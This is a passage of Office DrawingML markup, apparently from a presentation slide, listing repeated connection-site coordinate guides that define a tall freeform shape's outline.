              <a:gd name="connsiteX50" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 77640 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 21411 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY86" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY87" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY88" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY89" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY90" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY91" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271393 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245337 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230566 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486586 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 474956 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 77640 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 21411 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY86" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY87" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY88" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY89" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY90" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY91" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271393 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245337 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230566 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486586 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 474956 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 52003 w 1342163"/>
